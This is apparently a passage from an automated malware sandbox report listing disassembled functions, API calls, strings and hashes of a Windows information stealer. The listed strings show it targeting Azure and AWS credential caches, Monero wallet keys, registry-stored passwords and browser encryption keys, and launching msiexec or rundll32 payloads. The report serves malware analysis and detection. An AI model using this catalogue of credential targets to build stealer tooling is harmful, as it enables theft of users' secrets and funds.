                      • Part of subcall function 00964910: FindClose.KERNEL32(000000FF), ref: 00964B92
                    • lstrcat.KERNEL32(?,00000000), ref: 00964EC8
                    • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00964EE5
                      • Part of subcall function 00964910: wsprintfA.USER32 ref: 009649B0
                      • Part of subcall function 00964910: StrCmpCA.SHLWAPI(?,009708D2), ref: 009649C5
                      • Part of subcall function 00964910: wsprintfA.USER32 ref: 009649E2
                      • Part of subcall function 00964910: PathMatchSpecA.SHLWAPI(?,?), ref: 00964A1E
                      • Part of subcall function 00964910: lstrcat.KERNEL32(?,005BE768), ref: 00964A4A
                      • Part of subcall function 00964910: lstrcat.KERNEL32(?,00970FF8), ref: 00964A5C
                      • Part of subcall function 00964910: lstrcat.KERNEL32(?,?), ref: 00964A70
                      • Part of subcall function 00964910: lstrcat.KERNEL32(?,00970FFC), ref: 00964A82
                      • Part of subcall function 00964910: lstrcat.KERNEL32(?,?), ref: 00964A96
                      • Part of subcall function 00964910: CopyFileA.KERNEL32(?,?,00000001), ref: 00964AAC
                      • Part of subcall function 00964910: DeleteFileA.KERNEL32(?), ref: 00964B31
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                    • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                    • API String ID: 949356159-974132213
                    • Opcode ID: ebb494ff0fe6f13cbc9cdb176ba1f717567cfde9a90c0fe4cd8393fa8b1e610a
                    • Instruction ID: 184b0873e35cf82ce68871f8665383720f2bd0c5166e9bdd4d9882fe13f4f690
                    • Opcode Fuzzy Hash: ebb494ff0fe6f13cbc9cdb176ba1f717567cfde9a90c0fe4cd8393fa8b1e610a
                    • Instruction Fuzzy Hash: E54197BA95020867DB14F770EC97FED7338ABA4704F404454B549660C1FEB46BC9CB92
                    Function 00962E30 Relevance: 19.7, APIs: 3, Strings: 8, Instructions: 469COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    • ShellExecuteEx.SHELL32(0000003C), ref: 009631C5
                    • ShellExecuteEx.SHELL32(0000003C), ref: 0096335D
                    • ShellExecuteEx.SHELL32(0000003C), ref: 009634EA
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: ExecuteShell$lstrcpy
                    • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                    • API String ID: 2507796910-3625054190
                    • Opcode ID: c6755aaa8b1d681ffdd3c90875a069ca4a77ed3c4850a784c3f5f4ff64919974
                    • Instruction ID: e2166ca797a083352f0862f815f7b383bc0b4df9a59e14be7c79cbb91390b07c
                    • Opcode Fuzzy Hash: c6755aaa8b1d681ffdd3c90875a069ca4a77ed3c4850a784c3f5f4ff64919974
                    • Instruction Fuzzy Hash: DA12EA718101089ADB19EFA0DD92FEEB778AF94300F50815AF50677191EF742B4ACFA6
                    Function 009652C0 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 139stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 00956280: InternetOpenA.WININET(00970DFE,00000001,00000000,00000000,00000000), ref: 009562E1
                      • Part of subcall function 00956280: StrCmpCA.SHLWAPI(?,005BE8F8), ref: 00956303
                      • Part of subcall function 00956280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00956335
                      • Part of subcall function 00956280: HttpOpenRequestA.WININET(00000000,GET,?,005BE380,00000000,00000000,00400100,00000000), ref: 00956385
                      • Part of subcall function 00956280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 009563BF
                      • Part of subcall function 00956280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 009563D1
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                    • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00965318
                    • lstrlen.KERNEL32(00000000), ref: 0096532F
                      • Part of subcall function 00968E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00968E52
                    • StrStrA.SHLWAPI(00000000,00000000), ref: 00965364
                    • lstrlen.KERNEL32(00000000), ref: 00965383
                    • lstrlen.KERNEL32(00000000), ref: 009653AE
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                    • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                    • API String ID: 3240024479-1526165396
                    • Opcode ID: 62c547f61d56d721bcc589d8e22e58febbb42874c860bdd55a48c889863955fb
                    • Instruction ID: a2d1292ef2f658c94a761c8a84e2dd25b507f9200c81da6175fab33468e7e116
                    • Opcode Fuzzy Hash: 62c547f61d56d721bcc589d8e22e58febbb42874c860bdd55a48c889863955fb
                    • Instruction Fuzzy Hash: AB51EB709101489BDB14FF64CD96BEE7779AF90341F504018F80A6B5A2EF346B4ACFA6
                    Function 00964280 Relevance: 16.7, APIs: 11, Instructions: 204stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00968DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00968E0B
                    • lstrcat.KERNEL32(?,00000000), ref: 009642EC
                    • lstrcat.KERNEL32(?,005BE1D0), ref: 0096430B
                    • lstrcat.KERNEL32(?,?), ref: 0096431F
                    • lstrcat.KERNEL32(?,005BCE58), ref: 00964333
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 00968D90: GetFileAttributesA.KERNEL32(00000000,?,00951B54,?,?,0097564C,?,?,00970E1F), ref: 00968D9F
                      • Part of subcall function 00959CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00959D39
                      • Part of subcall function 009599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009599EC
                      • Part of subcall function 009599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A11
                      • Part of subcall function 009599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00959A31
                      • Part of subcall function 009599C0: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959A5A
                      • Part of subcall function 009599C0: LocalFree.KERNEL32(0095148F), ref: 00959A90
                      • Part of subcall function 009599C0: CloseHandle.KERNEL32(000000FF), ref: 00959A9A
                      • Part of subcall function 009693C0: GlobalAlloc.KERNEL32(00000000,009643DD,009643DD), ref: 009693D3
                    • StrStrA.SHLWAPI(?,005BE3C8), ref: 009643F3
                    • GlobalFree.KERNEL32(?), ref: 00964512
                      • Part of subcall function 00959AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959AEF
                      • Part of subcall function 00959AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00954EEE,00000000,?), ref: 00959B01
                      • Part of subcall function 00959AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00954EEE,00000000,00000000), ref: 00959B2A
                      • Part of subcall function 00959AC0: LocalFree.KERNEL32(?,?,?,?,00954EEE,00000000,?), ref: 00959B3F
                    • lstrcat.KERNEL32(?,00000000), ref: 009644A3
                    • StrCmpCA.SHLWAPI(?,009708D1), ref: 009644C0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 009644D2
                    • lstrcat.KERNEL32(00000000,?), ref: 009644E5
                    • lstrcat.KERNEL32(00000000,00970FB8), ref: 009644F4
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                    • String ID:
                    • API String ID: 3541710228-0
                    • Opcode ID: 5b398cbabb5447a735507d1ce87aa071fd93b6d5edfdf5788c35344b9cefd706
                    • Instruction ID: 20cb244b5092121b93f70037b187beb26fe111fffc79c01d5b7040bc29af9171
                    • Opcode Fuzzy Hash: 5b398cbabb5447a735507d1ce87aa071fd93b6d5edfdf5788c35344b9cefd706
                    • Instruction Fuzzy Hash: 22713776910208ABDB14EBE0DD85FEE737DAB88300F044599F605A7191EE35DB49CF91
                    Function 00951310 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 141stringfileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 009512A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 009512B4
                      • Part of subcall function 009512A0: RtlAllocateHeap.NTDLL(00000000), ref: 009512BB
                      • Part of subcall function 009512A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 009512D7
                      • Part of subcall function 009512A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 009512F5
                      • Part of subcall function 009512A0: RegCloseKey.ADVAPI32(?), ref: 009512FF
                    • lstrcat.KERNEL32(?,00000000), ref: 0095134F
                    • lstrlen.KERNEL32(?), ref: 0095135C
                    • lstrcat.KERNEL32(?,.keys), ref: 00951377
                      • Part of subcall function 0096A740: lstrcpy.KERNEL32(00970E17,00000000), ref: 0096A788
                      • Part of subcall function 0096A9B0: lstrlen.KERNEL32(?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 0096A9C5
                      • Part of subcall function 0096A9B0: lstrcpy.KERNEL32(00000000), ref: 0096AA04
                      • Part of subcall function 0096A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0096AA12
                      • Part of subcall function 0096A8A0: lstrcpy.KERNEL32(?,00970E17), ref: 0096A905
                      • Part of subcall function 00968B60: GetSystemTime.KERNEL32(00970E1A,005BA900,009705AE,?,?,009513F9,?,0000001A,00970E1A,00000000,?,005B9248,?,\Monero\wallet.keys,00970E17), ref: 00968B86
                      • Part of subcall function 0096A920: lstrcpy.KERNEL32(00000000,?), ref: 0096A972
                      • Part of subcall function 0096A920: lstrcat.KERNEL32(00000000), ref: 0096A982
                    • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00951465
                      • Part of subcall function 0096A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0096A7E6
                      • Part of subcall function 009599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 009599EC
                      • Part of subcall function 009599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00959A11
                      • Part of subcall function 009599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00959A31
                      • Part of subcall function 009599C0: ReadFile.KERNEL32(000000FF,?,00000000,0095148F,00000000), ref: 00959A5A
                      • Part of subcall function 009599C0: LocalFree.KERNEL32(0095148F), ref: 00959A90
                      • Part of subcall function 009599C0: CloseHandle.KERNEL32(000000FF), ref: 00959A9A
                    • DeleteFileA.KERNEL32(00000000), ref: 009514EF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                    • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                    • API String ID: 3478931302-218353709
                    • Opcode ID: 123568cc65c4b2a591e42f34a92404e2ca925ba97ffbb32b461df86b70447fc9
                    • Instruction ID: 1c3763bf48071cfa7b2f20ca74f891a702e8238e129462bfd7c9a15b0a56c2c6
                    • Opcode Fuzzy Hash: 123568cc65c4b2a591e42f34a92404e2ca925ba97ffbb32b461df86b70447fc9
                    • Instruction Fuzzy Hash: 435101B1D5011957CB15EB60DD92BED737CAF94300F4041A9B60A73092EE746B89CFA6
                    Function 009575D0 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 91stringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 009572D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 0095733A
                      • Part of subcall function 009572D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 009573B1
                      • Part of subcall function 009572D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 0095740D
                      • Part of subcall function 009572D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00957452
                      • Part of subcall function 009572D0: HeapFree.KERNEL32(00000000), ref: 00957459
                    • lstrcat.KERNEL32(00000000,009717FC), ref: 00957606
                    • lstrcat.KERNEL32(00000000,00000000), ref: 00957648
                    • lstrcat.KERNEL32(00000000, : ), ref: 0095765A
                    • lstrcat.KERNEL32(00000000,00000000), ref: 0095768F
                    • lstrcat.KERNEL32(00000000,00971804), ref: 009576A0
                    • lstrcat.KERNEL32(00000000,00000000), ref: 009576D3
                    • lstrcat.KERNEL32(00000000,00971808), ref: 009576ED
                    • task.LIBCPMTD ref: 009576FB
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$Heap$EnumFreeOpenProcessValuetask
                    • String ID: :
                    • API String ID: 2677904052-3653984579
                    • Opcode ID: 0fd984cf12532e2251b9d83d3e360fded21c4d39eaea06807200764a444ce84a
                    • Instruction ID: 5e231fbce601663c665fb3518bf941a07dd4b67c28accf6a7afa0940b939b167
                    • Opcode Fuzzy Hash: 0fd984cf12532e2251b9d83d3e360fded21c4d39eaea06807200764a444ce84a
                    • Instruction Fuzzy Hash: EB315C72901109DBCB04EBF5DD85EFF7378BB85306B144519F502A72A0DE34AA4ACB92
                    Function 009640B0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 124registrystringCOMMON
                    Download Yara Rule
                    APIs
                    • RegOpenKeyExA.ADVAPI32(80000001,005BDC40,00000000,00020119,?), ref: 009640F4
                    • RegQueryValueExA.ADVAPI32(?,005BE3E0,00000000,00000000,00000000,000000FF), ref: 00964118
                    • RegCloseKey.ADVAPI32(?), ref: 00964122
                    • lstrcat.KERNEL32(?,00000000), ref: 00964147
                    • lstrcat.KERNEL32(?,005BE248), ref: 0096415B
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$CloseOpenQueryValue
                    • String ID: H[$h[$[
                    • API String ID: 690832082-198580688
                    • Opcode ID: 830d039722be7a465fc643753ed122c5e2127e160d17ff9e4d4a5b4ac1d5fe41
                    • Instruction ID: abd05f1106f32186f312b17caa1eb7d0229567ca0b32066d5fce25fdfc71b0fe
                    • Opcode Fuzzy Hash: 830d039722be7a465fc643753ed122c5e2127e160d17ff9e4d4a5b4ac1d5fe41
                    • Instruction Fuzzy Hash: EF41A5B6D101086BDB14EBA0ED46FFE737DAB88300F008959B61657181EE755B888BE2
                    Function 00968100 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 67memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,005BE158,00000000,?,00970E2C,00000000,?,00000000), ref: 00968130
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00968137
                    • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00968158
                    • __aulldiv.LIBCMT ref: 00968172
                    • __aulldiv.LIBCMT ref: 00968180
                    • wsprintfA.USER32 ref: 009681AC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1722191751.0000000000951000.00000040.00000001.01000000.00000003.sdmp, Offset: 00950000, based on PE: true
                    • Associated: 00000000.00000002.1722173092.0000000000950000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A01000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A0D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000A32000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722191751.0000000000B9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000BAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000D34000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E0B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E2F000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E37000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722368946.0000000000E45000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722733864.0000000000E46000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722863891.0000000000FDC000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1722890392.0000000000FDD000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_950000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                    • String ID: %d MB$@
                    • API String ID: 2774356765-3474575989
                    • Opcode ID: 917a3a3eb6a3566d9e7e728f60df3e3e4c0fe74dc28b941c3b54083e38fb81f5
